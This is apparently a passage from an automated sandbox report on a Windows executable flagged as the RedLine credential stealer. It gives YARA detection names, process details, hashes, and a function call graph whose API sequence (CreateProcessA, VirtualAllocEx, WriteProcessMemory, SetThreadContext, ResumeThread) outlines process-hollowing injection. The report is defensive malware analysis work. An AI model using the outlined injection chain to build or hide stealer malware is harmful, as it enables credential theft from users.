                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.280657393.00000000044D6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.280657393.00000000044D6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.280558143.000000000443B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.280558143.000000000443B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.280558143.000000000443B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.280558143.000000000443B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:low

                                                                                  General

                                                                                  Target ID:1
                                                                                  Start time:05:54:16
                                                                                  Start date:25/05/2022
                                                                                  Path:C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
                                                                                  Imagebase:0xf80000
                                                                                  File size:1190912 bytes
                                                                                  MD5 hash:6A54566BF72BC5F07BAC04C982DAB3E6
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:.Net C# or VB.NET
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000002.364558379.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.364558379.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000000.257898395.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.257898395.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000000.258866341.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.258866341.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000000.260326785.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.260326785.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000002.365596726.000000000339F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000000.259617695.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.259617695.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:low

                                                                                  General

                                                                                  Target ID:5
                                                                                  Start time:05:54:19
                                                                                  Start date:25/05/2022
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff7c9170000
                                                                                  File size:625664 bytes
                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

                                                                                  Disassembly

                                                                                  Reset < >

                                                                                    Execution Graph

                                                                                    Execution Coverage:20.7%
                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                    Signature Coverage:13.2%
                                                                                    Total number of Nodes:485
                                                                                    Total number of Limit Nodes:45
                                                                                    execution_graph 17498 d90468 17499 d90477 17498->17499 17505 d90a8f 17499->17505 17515 d9069d 17499->17515 17533 d90498 17499->17533 17565 d90489 17499->17565 17500 d9047f 17513 d90754 17505->17513 17506 d90b64 17507 d90498 3 API calls 17506->17507 17508 d90bb7 17507->17508 17597 d90158 17508->17597 17513->17506 17514 d90498 LoadLibraryA VirtualProtect VirtualProtect 17513->17514 17514->17513 17516 d906a2 17515->17516 17517 d90498 3 API calls 17516->17517 17518 d906d0 17517->17518 17519 d90498 3 API calls 17518->17519 17520 d906e4 17519->17520 17521 d90498 3 API calls 17520->17521 17522 d906f8 17521->17522 17523 d90498 3 API calls 17522->17523 17532 d9070c 17523->17532 17524 d90498 LoadLibraryA VirtualProtect VirtualProtect 17524->17532 17525 d90b64 17526 d90498 3 API calls 17525->17526 17527 d90bb7 17526->17527 17528 d90158 LoadLibraryA 17527->17528 17529 d90bbe 17528->17529 17530 d90498 3 API calls 17529->17530 17531 d90bcb 17530->17531 17531->17500 17532->17524 17532->17525 17535 d904ab 17533->17535 17534 d90506 17534->17500 17535->17534 17558 d90489 3 API calls 17535->17558 17559 d90498 3 API calls 17535->17559 17561 d9069d 3 API calls 17535->17561 17562 d90a8f 3 API calls 17535->17562 17601 d90b8f 17535->17601 17609 d90ba8 17535->17609 17536 d905a0 17537 d90b64 17536->17537 17554 d90f48 VirtualProtect 17536->17554 17555 d90f50 VirtualProtect 17536->17555 17538 d90498 3 API calls 17537->17538 17539 d90bb7 17538->17539 17540 d90158 LoadLibraryA 17539->17540 17541 d90bbe 17540->17541 17542 d90498 3 API calls 17541->17542 17544 d90bcb 17542->17544 17543 d9065c 17545 d90498 3 API calls 17543->17545 17544->17500 17546 d906d0 17545->17546 17547 d90498 3 API calls 17546->17547 17548 d906e4 17547->17548 17549 d90498 3 API calls 17548->17549 17550 d906f8 17549->17550 17551 d90498 3 API calls 17550->17551 17552 d9070c 17551->17552 17552->17537 17553 d90498 LoadLibraryA VirtualProtect VirtualProtect 17552->17553 17553->17552 17554->17543 17555->17543 17564 d9054a 17558->17564 17559->17564 17561->17564 17562->17564 17616 d90f50 17564->17616 17620 d90f48 17564->17620 17567 d90498 17565->17567 17566 d90506 17566->17500 17567->17566 17591 d90489 3 API calls 17567->17591 17592 d90498 3 API calls 17567->17592 17593 d90ba8 3 API calls 17567->17593 17594 d9069d 3 API calls 17567->17594 17595 d90a8f 3 API calls 17567->17595 17596 d90b8f 3 API calls 17567->17596 17568 d9054a 17589 d90f48 VirtualProtect 17568->17589 17590 d90f50 VirtualProtect 17568->17590 17569 d905a0 17571 d90b64 17569->17571 17587 d90f48 VirtualProtect 17569->17587 17588 d90f50 VirtualProtect 17569->17588 17570 d9065c 17578 d90498 3 API calls 17570->17578 17572 d90498 3 API calls 17571->17572 17573 d90bb7 17572->17573 17574 d90158 LoadLibraryA 17573->17574 17575 d90bbe 17574->17575 17576 d90498 3 API calls 17575->17576 17577 d90bcb 17576->17577 17577->17500 17579 d906d0 17578->17579 17580 d90498 3 API calls 17579->17580 17581 d906e4 17580->17581 17582 d90498 3 API calls 17581->17582 17583 d906f8 17582->17583 17584 d90498 3 API calls 17583->17584 17586 d9070c 17584->17586 17585 d90498 LoadLibraryA VirtualProtect VirtualProtect 17585->17586 17586->17571 17586->17585 17587->17570 17588->17570 17589->17569 17590->17569 17591->17568 17592->17568 17593->17568 17594->17568 17595->17568 17596->17568 17600 d90be8 LoadLibraryA 17597->17600 17599 d90ce9 17600->17599 17602 d90b90 17601->17602 17603 d90498 3 API calls 17602->17603 17604 d90bb7 17603->17604 17605 d90158 LoadLibraryA 17604->17605 17606 d90bbe 17605->17606 17607 d90498 3 API calls 17606->17607 17608 d90bcb 17607->17608 17608->17564 17610 d90bb7 17609->17610 17611 d90498 3 API calls 17609->17611 17612 d90158 LoadLibraryA 17610->17612 17611->17610 17613 d90bbe 17612->17613 17614 d90498 3 API calls 17613->17614 17615 d90bcb 17614->17615 17615->17564 17617 d90f98 VirtualProtect 17616->17617 17619 d90fd3 17617->17619 17619->17536 17621 d90f50 VirtualProtect 17620->17621 17623 d90fd3 17621->17623 17623->17536 17624 d96560 17625 d9657a 17624->17625 17629 d965a8 17625->17629 17637 d96597 17625->17637 17626 d96594 17630 d965bb 17629->17630 17645 d965e1 17630->17645 17650 d965f0 17630->17650 17631 d965cc 17655 d9d490 17631->17655 17659 d9d480 17631->17659 17632 d965d9 17632->17626 17638 d965a8 17637->17638 17643 d965e1 6 API calls 17638->17643 17644 d965f0 6 API calls 17638->17644 17639 d965cc 17641 d9d490 6 API calls 17639->17641 17642 d9d480 6 API calls 17639->17642 17640 d965d9 17640->17626 17641->17640 17642->17640 17643->17639 17644->17639 17646 d9661a 17645->17646 17647 d966dc 17646->17647 17663 d97e10 17646->17663 17668 d97e20 17646->17668 17647->17631 17652 d9661a 17650->17652 17651 d966dc 17651->17631 17652->17651 17653 d97e10 6 API calls 17652->17653 17654 d97e20 6 API calls 17652->17654 17653->17651 17654->17651 17656 d9d4b2 17655->17656 17657 d99558 6 API calls 17656->17657 17658 d9d4cf 17657->17658 17658->17632 17660 d9d4b2 17659->17660 17661 d99558 6 API calls 17660->17661 17662 d9d4cf 17661->17662 17662->17632 17664 d97e20 17663->17664 17673 d99558 17664->17673 17680 d99548 17664->17680 17669 d97e47 17668->17669 17671 d99558 6 API calls 17669->17671 17672 d99548 6 API calls 17669->17672 17670 d97e84 17670->17647 17671->17670 17672->17670 17674 d99588 17673->17674 17675 d997df 17674->17675 17687 d9a069 17674->17687 17692 d99e50 17674->17692 17697 d99eba 17674->17697 17702 d99e48 17674->17702 17682 d99558 17680->17682 17681 d997df 17681->17681 17682->17681 17683 d9a069 6 API calls 17682->17683 17684 d99e48 6 API calls 17682->17684 17685 d99eba 6 API calls 17682->17685 17686 d99e50 6 API calls 17682->17686 17683->17681 17684->17681 17685->17681 17686->17681 17688 d9a07b 17687->17688 17689 d99eef 17687->17689 17688->17675 17689->17687 17707 d9a0a8 17689->17707 17720 d9a0b0 17689->17720 17693 d99e65 17692->17693 17694 d99e93 17692->17694 17693->17694 17695 d9a0a8 6 API calls 17693->17695 17696 d9a0b0 6 API calls 17693->17696 17694->17675 17695->17693 17696->17693 17698 d99eef 17697->17698 17699 d9a07b 17698->17699 17700 d9a0a8 6 API calls 17698->17700 17701 d9a0b0 6 API calls 17698->17701 17699->17675 17700->17698 17701->17698 17703 d99e65 17702->17703 17704 d99e93 17702->17704 17703->17704 17705 d9a0a8 6 API calls 17703->17705 17706 d9a0b0 6 API calls 17703->17706 17704->17675 17705->17703 17706->17703 17708 d9a09d 17707->17708 17709 d9a0ab 17707->17709 17708->17689 17710 d9a12f 17709->17710 17732 d9d668 17709->17732 17741 d9d4e8 17709->17741 17748 d9d4e2 17709->17748 17755 d9d660 17709->17755 17764 d9e100 17709->17764 17774 d9e400 17709->17774 17781 d9e3f0 17709->17781 17788 d9e0fe 17709->17788 17798 d9d7a8 17709->17798 17710->17689 17721 d9a0bf 17720->17721 17722 d9a12f 17721->17722 17723 d9d4e8 6 API calls 17721->17723 17724 d9d668 6 API calls 17721->17724 17725 d9d7a8 6 API calls 17721->17725 17726 d9e0fe 6 API calls 17721->17726 17727 d9e3f0 6 API calls 17721->17727 17728 d9e400 6 API calls 17721->17728 17729 d9e100 6 API calls 17721->17729 17730 d9d660 6 API calls 17721->17730 17731 d9d4e2 6 API calls 17721->17731 17722->17689 17723->17721 17724->17721 17725->17721 17726->17721 17727->17721 17728->17721 17729->17721 17730->17721 17731->17721 17733 d9d696 17732->17733 17735 d9d75c 17733->17735 17736 d9d805 17733->17736 17739 d9d8df 17733->17739 17734 d9da3f 17734->17709 17735->17709 17737 d99e50 6 API calls 17736->17737 17738 d9d8ce 17737->17738 17738->17709 17739->17734 17740 d99e50 6 API calls 17739->17740 17740->17734 17742 d9d5d2 17741->17742 17743 d9d516 17741->17743 17742->17709 17743->17742 17744 d9d57a 17743->17744 17745 d9d5d4 17743->17745 17747 d99e50 6 API calls 17744->17747 17746 d99e50 6 API calls 17745->17746 17746->17742 17747->17742 17749 d9d5d2 17748->17749 17750 d9d516 17748->17750 17749->17709 17750->17749 17751 d9d57a 17750->17751 17752 d9d5d4 17750->17752 17754 d99e50 6 API calls 17751->17754 17753 d99e50 6 API calls 17752->17753 17753->17749 17754->17749 17756 d9d696 17755->17756 17758 d9d75c 17756->17758 17759 d9d805 17756->17759 17762 d9d8df 17756->17762 17757 d9da3f 17757->17709 17758->17709 17760 d99e50 6 API calls 17759->17760 17761 d9d8ce 17760->17761 17761->17709 17762->17757 17763 d99e50 6 API calls 17762->17763 17763->17757 17765 d9e129 17764->17765 17766 d9e178 17764->17766 17765->17766 17767 d99e50 6 API calls 17765->17767 17768 d99e50 6 API calls 17766->17768 17769 d9e187 17766->17769 17770 d9e225 17766->17770 17767->17766 17768->17770 17769->17709 17771 d99e50 6 API calls 17770->17771 17773 d9e234 17770->17773 17772 d9e3ea 17771->17772 17772->17709 17773->17709 17775 d9e424 17774->17775 17778 d9e47c 17774->17778 17775->17778 17806 d9f978 17775->17806 17810 d9ea10 17775->17810 17826 d9e9ff 17775->17826 17842 d9f968 17775->17842 17778->17709 17782 d9e424 17781->17782 17783 d9e47c 17781->17783 17782->17783 17784 d9f978 6 API calls 17782->17784 17785 d9f968 6 API calls 17782->17785 17786 d9e9ff 6 API calls 17782->17786 17787 d9ea10 6 API calls 17782->17787 17783->17709 17784->17783 17785->17783 17786->17783 17787->17783 17789 d9e129 17788->17789 17791 d9e178 17788->17791 17790 d99e50 6 API calls 17789->17790 17789->17791 17790->17791 17792 d99e50 6 API calls 17791->17792 17793 d9e187 17791->17793 17794 d9e225 17791->17794 17792->17794 17793->17709 17795 d99e50 6 API calls 17794->17795 17797 d9e234 17794->17797 17796 d9e3ea 17795->17796 17796->17709 17797->17709 17799 d9d7d9 17798->17799 17800 d9d8df 17798->17800 17799->17800 17801 d9d805 17799->17801 17802 d9da3f 17800->17802 17805 d99e50 6 API calls 17800->17805 17803 d99e50 6 API calls 17801->17803 17802->17709 17804 d9d8ce 17803->17804 17804->17709 17805->17802 17808 d9f9a1 17806->17808 17809 d9fb57 17806->17809 17807 d99e50 6 API calls 17807->17809 17808->17807 17809->17778 17811 d9eb11 17810->17811 17814 d9ea3e 17810->17814 17812 d9eadb 17846 f41160 17812->17846 17863 f41440 17812->17863 17880 f40ea8 17812->17880 17897 f40e99 17812->17897 17914 f41528 17812->17914 17931 f410b8 17812->17931 17949 f412b8 17812->17949 17813 d9eaf2 17815 d9eaf0 17813->17815 17966 d9ec68 17813->17966 17977 d9f033 17813->17977 17984 d9eeed 17813->17984 17814->17812 17814->17813 17815->17778 17827 d9ea3e 17826->17827 17828 d9eb11 17826->17828 17829 d9eadb 17827->17829 17830 d9eaf2 17827->17830 17832 f41160 6 API calls 17829->17832 17833 f41440 6 API calls 17829->17833 17834 f410b8 6 API calls 17829->17834 17835 f412b8 6 API calls 17829->17835 17836 f41528 6 API calls 17829->17836 17837 f40ea8 6 API calls 17829->17837 17838 f40e99 6 API calls 17829->17838 17831 d9eaf0 17830->17831 17839 d9ec68 6 API calls 17830->17839 17840 d9eeed 6 API calls 17830->17840 17841 d9f033 6 API calls 17830->17841 17831->17778 17832->17831 17833->17831 17834->17831 17835->17831 17836->17831 17837->17831 17838->17831 17839->17831 17840->17831 17841->17831 17844 d9f9a1 17842->17844 17845 d9fb57 17842->17845 17843 d99e50 6 API calls 17843->17845 17844->17843 17845->17778 17848 f4116b 17846->17848 17847 f4182f 17849 f41286 17847->17849 17991 f01200 17847->17991 17997 f009a0 17847->17997 18003 f003a8 17847->18003 18009 f0038c 17847->18009 18015 f011e0 17847->18015 18021 f00980 17847->18021 17848->17847 17848->17849 17856 f41160 6 API calls 17848->17856 17857 f41440 6 API calls 17848->17857 17858 f410b8 6 API calls 17848->17858 17859 f412b8 6 API calls 17848->17859 17860 f41528 6 API calls 17848->17860 17861 f40ea8 6 API calls 17848->17861 17862 f40e99 6 API calls 17848->17862 17849->17815 17856->17848 17857->17848 17858->17848 17859->17848 17860->17848 17861->17848 17862->17848 17864 f4147e 17863->17864 17865 f4182f 17864->17865 17866 f414f8 17864->17866 17873 f41160 6 API calls 17864->17873 17874 f41440 6 API calls 17864->17874 17875 f410b8 6 API calls 17864->17875 17876 f412b8 6 API calls 17864->17876 17877 f41528 6 API calls 17864->17877 17878 f40ea8 6 API calls 17864->17878 17879 f40e99 6 API calls 17864->17879 17865->17866 17867 f011e0 2 API calls 17865->17867 17868 f01200 2 API calls 17865->17868 17869 f009a0 2 API calls 17865->17869 17870 f00980 2 API calls 17865->17870 17871 f003a8 2 API calls 17865->17871 17872 f0038c 2 API calls 17865->17872 17866->17815 17867->17866 17868->17866 17869->17866 17870->17866 17871->17866 17872->17866 17873->17864 17874->17864 17875->17864 17876->17864 17877->17864 17878->17864 17879->17864 17882 f40ed6 17880->17882 17881 f4182f 17883 f4108c 17881->17883 17884 f011e0 2 API calls 17881->17884 17885 f01200 2 API calls 17881->17885 17886 f009a0 2 API calls 17881->17886 17887 f00980 2 API calls 17881->17887 17888 f003a8 2 API calls 17881->17888 17889 f0038c 2 API calls 17881->17889 17882->17881 17882->17883 17890 f41160 6 API calls 17882->17890 17891 f41440 6 API calls 17882->17891 17892 f410b8 6 API calls 17882->17892 17893 f412b8 6 API calls 17882->17893 17894 f41528 6 API calls 17882->17894 17895 f40ea8 6 API calls 17882->17895 17896 f40e99 6 API calls 17882->17896 17883->17815 17884->17883 17885->17883 17886->17883 17887->17883 17888->17883 17889->17883 17890->17882 17891->17882 17892->17882 17893->17882 17894->17882 17895->17882 17896->17882 17899 f40ed6 17897->17899 17898 f4182f 17900 f4108c 17898->17900 17901 f011e0 2 API calls 17898->17901 17902 f01200 2 API calls 17898->17902 17903 f009a0 2 API calls 17898->17903 17904 f00980 2 API calls 17898->17904 17905 f003a8 2 API calls 17898->17905 17906 f0038c 2 API calls 17898->17906 17899->17898 17899->17900 17907 f41160 6 API calls 17899->17907 17908 f41440 6 API calls 17899->17908 17909 f410b8 6 API calls 17899->17909 17910 f412b8 6 API calls 17899->17910 17911 f41528 6 API calls 17899->17911 17912 f40ea8 6 API calls 17899->17912 17913 f40e99 6 API calls 17899->17913 17900->17815 17901->17900 17902->17900 17903->17900 17904->17900 17905->17900 17906->17900 17907->17899 17908->17899 17909->17899 17910->17899 17911->17899 17912->17899 17913->17899 17915 f41559 17914->17915 17916 f4182f 17915->17916 17917 f4199c 17915->17917 17924 f41160 6 API calls 17915->17924 17925 f41440 6 API calls 17915->17925 17926 f410b8 6 API calls 17915->17926 17927 f412b8 6 API calls 17915->17927 17928 f41528 6 API calls 17915->17928 17929 f40ea8 6 API calls 17915->17929 17930 f40e99 6 API calls 17915->17930 17916->17917 17918 f011e0 2 API calls 17916->17918 17919 f01200 2 API calls 17916->17919 17920 f009a0 2 API calls 17916->17920 17921 f00980 2 API calls 17916->17921 17922 f003a8 2 API calls 17916->17922 17923 f0038c 2 API calls 17916->17923 17917->17815 17918->17917 17919->17917 17920->17917 17921->17917 17922->17917 17923->17917 17924->17915 17925->17915 17926->17915 17927->17915 17928->17915 17929->17915 17930->17915 17932 f410ec 17931->17932 17934 f41153 17931->17934 17932->17815 17933 f4182f 17935 f41286 17933->17935 17943 f011e0 2 API calls 17933->17943 17944 f01200 2 API calls 17933->17944 17945 f009a0 2 API calls 17933->17945 17946 f00980 2 API calls 17933->17946 17947 f003a8 2 API calls 17933->17947 17948 f0038c 2 API calls 17933->17948 17934->17933 17934->17935 17936 f41160 6 API calls 17934->17936 17937 f41440 6 API calls 17934->17937 17938 f410b8 6 API calls 17934->17938 17939 f412b8 6 API calls 17934->17939 17940 f41528 6 API calls 17934->17940 17941 f40ea8 6 API calls 17934->17941 17942 f40e99 6 API calls 17934->17942 17935->17815 17936->17934 17937->17934 17938->17934 17939->17934 17940->17934 17941->17934 17942->17934 17943->17935 17944->17935 17945->17935 17946->17935 17947->17935 17948->17935 17951 f412ee 17949->17951 17950 f4182f 17952 f41418 17950->17952 17953 f011e0 2 API calls 17950->17953 17954 f01200 2 API calls 17950->17954 17955 f009a0 2 API calls 17950->17955 17956 f00980 2 API calls 17950->17956 17957 f003a8 2 API calls 17950->17957 17958 f0038c 2 API calls 17950->17958 17951->17950 17951->17952 17959 f41160 6 API calls 17951->17959 17960 f41440 6 API calls 17951->17960 17961 f410b8 6 API calls 17951->17961 17962 f412b8 6 API calls 17951->17962 17963 f41528 6 API calls 17951->17963 17964 f40ea8 6 API calls 17951->17964 17965 f40e99 6 API calls 17951->17965 17952->17815 17953->17952 17954->17952 17955->17952 17956->17952 17957->17952 17958->17952 17959->17951 17960->17951 17961->17951 17962->17951 17963->17951 17964->17951 17965->17951 17967 d9ec6d 17966->17967 17968 d9ee7d 17967->17968 17971 d9ecf3 17967->17971 17974 d9ec68 6 API calls 17967->17974 17975 d9eeed 6 API calls 17967->17975 17976 d9f033 6 API calls 17967->17976 17968->17815 17969 d9f0d4 17969->17968 17973 d99e50 6 API calls 17969->17973 17970 d9f07c 17972 d99e50 6 API calls 17970->17972 17971->17968 17971->17969 17971->17970 17972->17968 17973->17968 17974->17967 17975->17967 17976->17967 17978 d9f03f 17977->17978 17979 d9f0d4 17978->17979 17980 d9f07c 17978->17980 17982 d99e50 6 API calls 17979->17982 17983 d9f0d2 17979->17983 17981 d99e50 6 API calls 17980->17981 17981->17983 17982->17983 17983->17815 17986 d9eef8 17984->17986 17985 d9f0d4 17989 d99e50 6 API calls 17985->17989 17990 d9f0d2 17985->17990 17986->17985 17987 d9f07c 17986->17987 17986->17990 17988 d99e50 6 API calls 17987->17988 17988->17990 17989->17990 17990->17815 17992 f01409 17991->17992 17993 f01230 17991->17993 17992->17849 17993->17992 17995 f48ab0 WriteProcessMemory 17993->17995 17996 f48aab WriteProcessMemory 17993->17996 17994 f013fa 17994->17849 17995->17994 17996->17994 17998 f00d4e 17997->17998 17999 f009d3 17997->17999 17998->17849 17999->17998 18001 f48514 CreateProcessA 17999->18001 18002 f48520 CreateProcessA 17999->18002 18000 f00d3f 18000->17849 18001->18000 18002->18000 18004 f00514 18003->18004 18005 f003d8 18003->18005 18004->17849 18005->18004 18007 f454b0 VirtualProtect 18005->18007 18008 f454a8 VirtualProtect 18005->18008 18006 f00505 18006->17849 18007->18006 18008->18006 18010 f00514 18009->18010 18011 f003d8 18009->18011 18010->17849 18011->18010 18013 f454b0 VirtualProtect 18011->18013 18014 f454a8 VirtualProtect 18011->18014 18012 f00505 18012->17849 18013->18012 18014->18012 18017 f011ee 18015->18017 18016 f01409 18016->17849 18017->18016 18019 f48ab0 WriteProcessMemory 18017->18019 18020 f48aab WriteProcessMemory 18017->18020 18018 f013fa 18018->17849 18019->18018 18020->18018 18022 f00d4e 18021->18022 18023 f009d3 18021->18023 18022->17849 18023->18022 18025 f48514 CreateProcessA 18023->18025 18026 f48520 CreateProcessA 18023->18026 18024 f00d3f 18024->17849 18025->18024 18026->18024 18027 f44cf8 18028 f44d17 18027->18028 18030 d965a8 6 API calls 18028->18030 18031 d96597 6 API calls 18028->18031 18029 f44d23 18030->18029 18031->18029 18032 f45ed8 18033 f45f20 SetKernelObjectSecurity 18032->18033 18035 f45f65 18033->18035 18036 f488a8 18037 f488ed SetThreadContext 18036->18037 18039 f48935 18037->18039 18040 f48c58 18041 f48c98 VirtualAllocEx 18040->18041 18043 f48cd5 18041->18043 18044 f48d18 18045 f48d58 ResumeThread 18044->18045 18047 f48d89 18045->18047

                                                                                    Executed Functions

                                                                                    Function 00D92CF0 Relevance: 2.6, Instructions: 2596COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.268173769.0000000000D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D90000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_d90000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 64e56aaa1c7044e127c5bfb08e751257e69c993106d949e0eb814543c961ad0e
                                                                                    • Instruction ID: 41907f440c94b2d4340ebc2ea7cbf7190a368a94e8fdccf7628ac71d4d3e0e3f
                                                                                    • Opcode Fuzzy Hash: 64e56aaa1c7044e127c5bfb08e751257e69c993106d949e0eb814543c961ad0e
                                                                                    • Instruction Fuzzy Hash: 65430974A00619CFCF24DF68C988A9DB7B2BF49314F1581A5E409AB365DB31EE81CF61
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00D97180 Relevance: 1.5, Strings: 1, Instructions: 258COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.268173769.0000000000D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D90000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_d90000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: fish
                                                                                    • API String ID: 0-1064584243
                                                                                    • Opcode ID: 1473dc318017e33323ae9966ffef2644a0ea2fdda8a0c01382b55bb818e7728a
                                                                                    • Instruction ID: e4a952996394ecd04e01d6bccec24b79f95c131de7eb36d1b4de6960fba318e7
                                                                                    • Opcode Fuzzy Hash: 1473dc318017e33323ae9966ffef2644a0ea2fdda8a0c01382b55bb818e7728a
                                                                                    • Instruction Fuzzy Hash: 0F91CF70A142199FDB04DFB9D890AAEBBB6FF84314F148829E512D7351DB70AD09CBA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00F41C00 Relevance: 1.2, Instructions: 1216COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.268299661.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_f40000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c0a38101621fbdd0d425f6442ecdecb9a08be6fab8a99ab8bccf8a62cf52d221
                                                                                    • Instruction ID: d4c51263c02138c9f77abc31c5c55dda02665872e6f9459942f7243027f35e51
                                                                                    • Opcode Fuzzy Hash: c0a38101621fbdd0d425f6442ecdecb9a08be6fab8a99ab8bccf8a62cf52d221
                                                                                    • Instruction Fuzzy Hash: 74B20736A00518DFCB55CFA8C984D99BBB2FF49314B1680E5E6099B272DB31ED91EF40
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00F40EA8 Relevance: 1.2, Instructions: 1174COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.268299661.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_f40000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c02761401582c798b56d8e4c16f7c8587232e68b94d834bff5e353bfd7799446
                                                                                    • Instruction ID: 8a9ab801df2340fe85e006cdef107ddadbc801f57e1e2edd0ac9438fdce05766
                                                                                    • Opcode Fuzzy Hash: c02761401582c798b56d8e4c16f7c8587232e68b94d834bff5e353bfd7799446
                                                                                    • Instruction Fuzzy Hash: F1A2D335A04255CFCB15CF69C4909ADBBF2FF89310B1984AAE845DB362DB34ED81DB60
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00D91E28 Relevance: .7, Instructions: 715COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.268173769.0000000000D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D90000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_d90000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: cada9ada9a698bc29e3912e0a6be1c17ab73de4afe407e90270d2826f9aa33f6
                                                                                    • Instruction ID: 15c135d56fe749ade1ee44b3f89510d9171cb2fc2741af6d94e16345e6f7a456
                                                                                    • Opcode Fuzzy Hash: cada9ada9a698bc29e3912e0a6be1c17ab73de4afe407e90270d2826f9aa33f6
                                                                                    • Instruction Fuzzy Hash: 33526D35B00115AFCF14DF68C888AADB7B2BF89314B1A8169E816DB765DB31DC41CBA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

